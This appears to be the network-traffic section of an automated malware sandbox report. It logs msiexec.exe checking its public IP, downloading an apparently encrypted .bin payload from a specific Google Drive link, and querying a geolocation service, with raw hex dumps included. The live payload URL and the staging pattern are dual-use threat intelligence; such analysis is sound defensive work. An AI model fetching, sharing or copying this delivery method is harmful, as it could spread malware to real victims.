                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.449800193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:18.050544977 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:18.514950991 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:18 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 9cc9dd0d799153c07bc3b0c1f5e62ee3
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.449808193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:19.128623962 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:19.622350931 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:19 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 7a0275c33e5c5f3773507381dfdc4ae2
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.449816193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:20.235567093 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:20.709753990 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:20 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: bebfdf37d67e092f6d2aa4e59ae8ac16
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449736142.250.185.1104437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:06 UTC208OUTGET /uc?export=download&id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM HTTP/1.1
                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: drive.google.com
                                            Cache-Control: no-cache
                                            2024-10-14 07:12:07 UTC1610INHTTP/1.1 303 See Other
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Mon, 14 Oct 2024 07:12:06 GMT
                                            Location: https://drive.usercontent.google.com/download?id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM&export=download
                                            Strict-Transport-Security: max-age=31536000
                                            Cross-Origin-Opener-Policy: same-origin
                                            Content-Security-Policy: script-src 'nonce-O2DR5eT1xGrW6x2WkwpTFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449737142.250.185.974437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:07 UTC250OUTGET /download?id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM&export=download HTTP/1.1
                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Cache-Control: no-cache
                                            Host: drive.usercontent.google.com
                                            Connection: Keep-Alive
                                            2024-10-14 07:12:10 UTC4889INHTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Content-Security-Policy: sandbox
                                            Content-Security-Policy: default-src 'none'
                                            Content-Security-Policy: frame-ancestors 'none'
                                            X-Content-Security-Policy: sandbox
                                            Cross-Origin-Opener-Policy: same-origin
                                            Cross-Origin-Embedder-Policy: require-corp
                                            Cross-Origin-Resource-Policy: same-site
                                            X-Content-Type-Options: nosniff
                                            Content-Disposition: attachment; filename="phdBweyXE230.bin"
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Credentials: false
                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                            Accept-Ranges: bytes
                                            Content-Length: 279616
                                            Last-Modified: Mon, 14 Oct 2024 00:14:50 GMT
                                            X-GUploader-UploadID: AHmUCY1yY9dMA9NcO5X-WShusv0Kk2MiJZQarhuj3lgFws2GG7MJbPVXxaboAZ9weBDHCsTpySw
                                            Date: Mon, 14 Oct 2024 07:12:09 GMT
                                            Expires: Mon, 14 Oct 2024 07:12:09 GMT
                                            Cache-Control: private, max-age=0
                                            X-Goog-Hash: crc32c=mFnskw==
                                            Server: UploadServer
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                            Connection: close
                                            2024-10-14 07:12:10 UTC4889INData Raw: 37 ee 8c 7e db 5c 03 2a 15 0f b8 ca 8d 6e ff 44 f2 bb e8 31 83 e6 c0 28 ee 93 d9 e5 1d 87 e1 30 62 31 18 77 34 cf 29 b4 cd 8e a9 d0 af 59 d4 c4 03 a0 44 8f 0a 45 5d ed db d3 42 86 35 fd 5c 67 ae f7 74 9e b5 9a 29 6e fc 5e 61 eb f7 48 6c 41 27 86 e2 87 91 ea be 04 bd f7 a3 48 75 31 1d a5 58 7a a0 0b 55 f4 e7 88 fb 89 1b bb 84 da f5 13 22 8d 3d 95 37 8c 66 5c 7c 97 f5 77 93 e0 33 a9 f6 7b e0 6b 9e 7f 14 31 30 90 f2 13 79 03 54 77 d7 bf 6f c4 0b 15 eb 43 46 07 0d ff a0 f7 7f 27 9d 95 67 84 50 f3 a3 db 88 d1 92 e1 b8 25 5b 38 a4 e2 1b 1d 5b 46 6b a7 0f da 5a a3 0d d1 5a 19 c4 e1 e9 d5 15 e2 a4 a9 c0 61 a4 e5 01 a2 9b 9d 22 fa 2c f0 70 71 24 e0 ac d4 0e 1f 9d eb 72 b7 bf eb 88 88 a9 c2 90 fd 58 66 7a 38 05 aa bd ea 3e 35 e8 25 ce 79 bd 6b 85 b0 6a 62 3b fc c7
                                            Data Ascii: 7~\*nD1(0b1w4)YDE]B5\gt)n^aHlA'Hu1XzU"=7f\|w3{k10yTwoCF'gP%[8[FkZZa",pq$rXfz8>5%ykjb;
                                            2024-10-14 07:12:10 UTC4889INData Raw: 78 94 fb c2 28 49 c5 f3 19 99 c5 fa f7 ea c4 80 66 5b 08 f2 52 b4 7a 03 fd 00 81 6f c6 52 02 45 4b cd 8f 27 cc 73 e8 e6 99 00 51 0c b8 c4 16 90 8f c0 2f 32 3e ad 0b 99 d9 ac 73 dc 45 7c 71 bf 79 ca db e0 c4 d8 99 4e 9e 29 91 74 01 59 3b fa 43 3d 9d cf d7 e4 11 19 95 d0 a5 85 f2 f3 eb d7 b4 96 c0 16 59 15 fe 65 73 17 2d 55 65 5a b8 f9 82 7e 14 08 a6 27 00 a7 44 55 65 85 98 b5 d6 78 af 72 b9 78 65 c6 94 46 ba 69 2e d5 e1 0d 8a 42 25 33 ce 95 31 86 21 83 d0 1a 2f 43 f3 80 bf 5c c2 0e 5d 12 5c 2a c1 39 ae 37 89 91 65 18 20 0b b0 e9 60 af ed 5f 98 23 52 da 8b 1f 10 65 ec ee 05 4f 14 e1 19 41 b3 a3 9f cc d0 ab 49 f0 58 00 56 ba 4b c9 cf 0c 8b e8 1b 0d 39 e2 ff 3b d9 b3 46 af e8 e2 c0 ec e6 7e ed 7d ec 7a 85 2f 60 77 73 5d 04 42 87 bc b8 db 90 a5 57 5e eb a7 ed
                                            Data Ascii: x(If[RzoREK'sQ/2>sE|qyN)tY;C=Yes-UeZ~'DUexrxeFi.B%31!/C\]\*97e `_#ReOAIXVK9;F~}z/`ws]BW^
                                            2024-10-14 07:12:10 UTC34INData Raw: f4 1a 5f 4a b8 10 c6 0d 42 7e bd a8 02 87 14 3e 57 05 96 52 e2 10 13 fb 53 0e ed 28 99 9e 0e 6f 11 a9
                                            Data Ascii: _JB~>WRS(o
                                            2024-10-14 07:12:10 UTC1320INData Raw: f8 4b 3a 00 5e e4 f1 6f af 50 9d 83 6c 9c 9d a7 ae 6e 88 20 6e b6 68 09 3e ca 45 43 37 be 73 5e bc ba a2 b2 aa 78 29 52 36 66 6c db cb f8 0e 17 a8 d4 c3 1c 54 3a 7e 55 b0 03 2a a1 d4 c7 eb 9e 12 64 f2 ed 54 d3 6e b8 60 d9 31 88 66 68 48 f5 d6 17 b1 e8 0f b0 22 75 8d 14 b3 72 c6 2c 5a e5 1c 89 5d 98 50 ee 63 6c a2 ff e2 9e 4a f4 bb 28 41 f8 a8 54 88 40 c1 cd 07 e6 de 03 e8 94 af d2 4b c4 82 d6 ed 49 18 76 fe 39 42 89 b7 a3 2c c8 9d 63 70 7f ec 9a a0 25 18 44 cb c4 c6 87 f7 6d 3a 35 96 0d 04 0a 64 5b 49 d4 e9 a7 55 42 6e fe 43 2d 6d ca 0e c1 af 8a 53 97 78 f3 ad b7 77 df 79 e5 3b f6 18 74 ff 43 d2 92 df 24 1f bf 4d b6 3a 8e e4 50 c2 95 2e 81 8f 76 75 e0 5d 41 9a 1c 8a c3 7b 7c 55 25 38 c9 6b 49 90 58 4a 6d 45 35 5e 9f 29 ed f6 0b b2 e0 b7 23 cd 98 5b fc e1
                                            Data Ascii: K:^oPln nh>EC7s^x)R6flT:~U*dTn`1fhH"ur,Z]PclJ(AT@KIv9B,cp%Dm:5d[IUBnC-mSxwy;tC$M:P.vu]A{|U%8kIXJmE5^)#[
                                            2024-10-14 07:12:10 UTC1390INData Raw: 9d 93 90 2c 52 c6 3f 47 38 55 a1 ea a2 db 7d 55 a7 db d7 52 c7 dd 47 37 41 dc d2 d0 fa 27 b9 45 87 04 f0 c5 d0 cb ec 47 89 49 36 d7 0c 3c 3d 1d 63 80 3e dd f8 e0 66 7a 2a 94 0e 9e ef d9 b6 e2 bf c9 90 98 6c 98 69 e0 56 7c 7f 19 43 84 ed b4 f3 14 26 84 9e e0 8a c5 77 41 55 9b 1c b9 6d 51 00 96 03 74 38 7c eb df 8b 4b 5e 81 cd d4 78 03 a4 64 f2 e1 49 52 bd b3 27 67 7a a5 2a 64 3d 9d aa e4 94 a3 63 a3 2b 8e b6 83 2a cc a4 0f 1f f1 75 d0 61 df db 48 e8 8a d9 91 ef 7e 75 21 50 78 de 3b 24 c6 65 c1 44 37 1d 98 de bb 78 d7 a2 0c 38 d6 a3 62 72 f8 3c 9a f5 c6 4e 1d 64 d4 d6 85 00 04 02 98 58 ba 09 08 a4 5e 04 be de 02 81 6b 13 73 57 f3 e1 0e 61 75 0f 99 94 84 0b 62 36 1f 05 e4 90 10 42 5a 5a 8b d1 70 51 59 c5 1f bd d2 e0 65 32 7a 9d 33 7c 7e 3d 0b e6 9a be ef da
                                            Data Ascii: ,R?G8U}URG7A'EGI6<=c>fz*liV|C&wAUmQt8|K^xdIR'gz*d=c+*uaH~u!Px;$eD7x8br<NdX^ksWaub6BZZpQYe2z3|~=
                                            2024-10-14 07:12:10 UTC1390INData Raw: c1 cc 91 61 ea d5 f2 43 b3 56 75 d0 0d ee 6a b5 9b 08 45 9d 00 97 7c d5 47 e8 e2 e1 44 5c 0c e0 b0 3e 11 85 1e 25 24 ea ac 18 d1 84 a5 5f d2 54 74 66 8a b3 ca db dd c5 d8 b2 d4 9f 38 99 6c 6e 93 3b fa 49 3d 9d dc df 9a 2f b4 94 d4 8d 55 f2 f3 e1 70 79 96 c0 12 59 04 f6 1b 49 17 2d 51 1b 61 b8 f8 86 0d a8 df a7 2d 6f b2 45 55 6f 95 89 bd c7 3b c0 bc b8 63 5f c5 85 f1 d5 a6 2e c6 eb 0d b3 26 25 1b ab 95 ef 9c 0f ac cc 40 2f 49 ea 89 d0 28 a0 0e 57 77 e6 2a c1 33 ae 4e a3 81 e8 43 52 5c b3 86 75 b9 c5 d4 98 24 5f a3 13 1e 03 64 fa 8a 5b 84 15 eb 76 57 98 a3 95 c4 f8 33 20 f0 52 19 49 c0 7d d8 cb 00 ee b9 60 0d 49 fe c4 bf d9 a2 49 ca 7d e3 d3 eb e4 75 c5 a2 ee 15 e9 39 48 0b 73 83 00 42 b6 ba 98 d3 81 8b 4f 5f eb ad e7 21 aa 24 4f 10 24 28 58 f7 54 51 e3 6d
                                            Data Ascii: aCVujE|GD\>%$_Ttf8ln;I=/UpyYI-Qa-oEUo;c_.&%@/I(Ww*3NCR\u$_d[vW3 RI}`II}u9HsBO_!$O$(XTQm
                                            2024-10-14 07:12:10 UTC1390INData Raw: 48 dc ca 51 b7 c0 ab b1 51 2e c4 d3 e1 ea 08 04 f2 c3 af 6d 1b 91 af ee 92 32 74 2d af 20 16 a6 6f 60 68 f9 e1 99 38 ba 65 f7 2e 23 0f 37 50 fb 8b 44 d1 38 f3 ba 70 c0 c2 a3 83 a8 c2 76 d7 cb 5b 82 1c aa e9 53 09 bf ed 24 4b 6e 0c 80 14 82 88 7e 32 2f 96 6a d3 04 bc a7 e6 7b f1 aa b8 27 b2 bf 68 41 7d 71 44 65 8f c1 ce 22 ba 22 24 0f a7 d5 a3 26 fc 14 66 d2 5f cc 68 f9 98 5d a1 67 29 11 3e 4b 0a 11 cd 09 69 a1 7e 9c 63 5e 78 eb 91 f6 e6 8d 5d b5 b2 7c f0 66 02 45 31 8a 73 24 63 cb da 7c 9d 3e ad fe de 7c ae 4c 87 62 fe 8e 82 2e 5a a3 64 5c 0e 2a dc e4 32 b9 7e f7 b7 25 c1 8f 76 0b f6 46 4d b5 15 04 99 84 6c e7 b8 15 90 6a 1d 7b f9 ab f8 0c ff 3b ac 3a 04 93 00 75 83 fb 19 f1 09 db 23 81 c4 7f 0c 7a 35 18 f0 aa a4 ce c1 1e fb 09 6e ae d5 41 24 44 96 97 f4
                                            Data Ascii: HQQ.m2t- o`h8e.#7PD8pv[S$Kn~2/j{'hA}qDe""$&f_h]g)>Ki~c^x]|fE1s$c|>|Lb.Zd\*2~%vFMlj{;:u#z5nA$D
                                            2024-10-14 07:12:10 UTC1390INData Raw: e5 2a e9 ad c4 9e ba 9a 29 46 8f 5e 61 e1 08 ab e1 01 9f 86 e3 a2 87 98 03 0f fd 87 8b 09 75 31 1b 07 7d 6d de 4e 55 f4 e3 2a de 91 69 67 95 da 85 3b 62 8d 3d 93 95 a9 7f 22 3a 97 f5 73 b1 c5 29 db f0 76 5a 15 3c ee 06 e7 9c 68 f3 5f b5 07 16 6d 34 dc 4f c4 db 5f 9b 19 93 6a 2d 96 63 bc 09 3a 6b a0 05 91 d2 a4 cf 9d 1c b8 fc cb 5e 4f 12 6a ad 9f 7f 08 d7 63 13 ad 2b d0 f8 8b 78 d1 5a 13 87 ba 9b 1f 4c e3 d7 d7 06 e4 34 87 29 eb 9b 9d 28 88 94 e2 90 01 0e a3 a7 d5 58 0e 83 d4 62 9f fb ff 88 8e a9 1f 11 fc 36 2a 5b 10 31 8a bd e0 2d 4a ec 0d ac 79 fd 61 5b 90 6a 62 3b fe b9 35 4c b8 14 b4 5a 40 00 ff be 2a 02 66 69 5f 13 18 45 d9 b1 02 db 60 cb 13 29 8a b0 45 69 28 60 e7 c6 7a 7e 71 e5 d4 7d af 6d 8a 83 6c 28 90 31 86 da 82 36 9a 15 5e 16 5d b3 73 73 46 1c
                                            Data Ascii: *)F^au1}mNU*ig;b=":s)vZ<h_m4O_j-c:k^Ojc+xZL4)(Xb6*[1-Jya[jb;5LZ@*fi_E`)Ei(`z~q}ml(16^]ssF
                                            2024-10-14 07:12:10 UTC1390INData Raw: 16 71 6a ad 92 1c 86 d3 08 5f d0 1f 7f 74 e5 1a 16 f9 dd 29 8d 54 ad fa 7a 17 ed 02 fe e3 76 e2 ee f1 84 3e 12 22 ec 5f f8 79 ce 52 52 40 f5 90 4e c5 be 97 a9 78 cf a3 ec af e2 81 ef 4b 57 fe 24 1c 09 8d ef e5 d2 87 f9 d4 c2 1e 38 c3 94 b8 c8 1a dc 3a 25 72 45 84 86 ee 50 5f 81 fd 61 83 80 58 d1 c3 17 95 c7 04 b6 e5 65 06 f7 c1 cf 55 ce c1 b4 01 aa 40 f1 95 e6 30 2a 8f 95 ac 52 b7 a5 bd 61 b5 da 83 18 0e d5 fc d0 f1 17 11 21 29 04 11 b3 94 a9 0f 55 49 e0 64 ce f9 43 b3 3a 22 14 b8 79 51 57 15 ea a6 73 fa 6c cd 19 a6 5d b7 0f cd 67 58 a2 e0 bf a6 23 1b 6a 8e 57 d0 4b 90 bb 4e 63 b7 21 64 33 1e 38 ef 9a 5a e5 2e 7f f8 90 ce f0 7a 8c 7c ea 8f 11 c6 40 90 d0 90 9c 6c 98 69 31 ba 66 0d 28 53 8c e3 27 db 61 22 f6 c3 f1 a8 a3 49 1f d4 9b 16 b3 5b af 0d 85 0a 4d
                                            Data Ascii: qj_t)Tzv>"_yRR@NxKW$8:%rEP_aXeU@0*Ra!)UIdC:"yQWsl]gX#jWKNc!d38Z.z|@li1f(S'a"I[M
                                            2024-10-14 07:12:10 UTC1390INData Raw: f9 84 0c 1a 7d 11 57 6e ab fe 23 e7 9e 40 1a 77 ed 8e 73 81 fd de c1 30 e4 60 98 de e7 c8 17 bd 56 44 64 35 18 29 0f 01 a8 4f fe 2f fd 77 64 b9 17 c8 d8 15 2d 61 3f 11 7f b7 87 95 4c 66 d8 e5 a1 19 c3 68 20 7e 5e e5 47 74 63 a1 a9 fa e5 3d 70 14 cf 94 ed a9 64 9f 26 d0 a2 bf 69 1f a7 8a ae 19 ad f4 fd 9c 42 74 9f 3f 9f 7c b2 25 3a 94 77 23 d2 e1 ed 71 6e 1c ab f6 2d 26 c2 b5 fe e3 8c bc bd 4d fe 52 2c 7f e7 15 ef d8 d9 bb b5 87 de d3 f3 64 8a e0 85 d7 e9 f9 f6 e4 d0 f2 4a 93 06 82 e1 9c 41 23 58 0d ee 64 64 77 10 37 e9 1c 9f 72 46 62 f1 98 ab 13 5e 08 32 83 0c e2 be 1d 2f 42 b6 88 10 a6 b5 ac 73 da e7 59 6d 97 41 dc db a7 67 f0 ec df 9f 23 82 5c 7f 18 3b fa 47 4f b1 de d7 94 63 30 83 d0 d5 f1 5e f3 eb 15 a6 b1 c0 18 73 15 fe 65 32 83 2d 55 67 5a b8 f8 71
                                            Data Ascii: }Wn#@ws0`VDd5)O/wd-a?Lfh ~^Gtc=pd&iBt?|%:w#qn-&MR,dJA#Xddw7rFb^2/BsYmAg#\;GOc0^se2-UgZq


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449750188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-10-14 07:12:12 UTC708INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:12 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24008
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZLdXr2C1hR16QymoYuGQQYZoGOW%2BmWvHkFM2ntR4QF5XSXaY%2F5MwoYflR%2BnXxW2ISYBGewWXEIaicxBnHZNM29AqVOgChmpEOH6QyKy%2BiiKlZdpjFhX9klOdHgJmhxLmQ8jqRPj"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c27f0bb10f6b-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449756188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:13 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-10-14 07:12:13 UTC708INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:13 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24009
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pmik0iEcsCiLPZ1EuLEtFOml%2BCMK5CO56nSl9cz%2Bh6%2BXBdMMFK1KiyR0oNM0YyqlB6W4MMvgJiYQJlalL2oNNIBuZA7Gps5hTwlzHojJUFLnzRe5Y0DzodHA5v5sRzAN1j%2BVja3a"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2841aa8423f-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


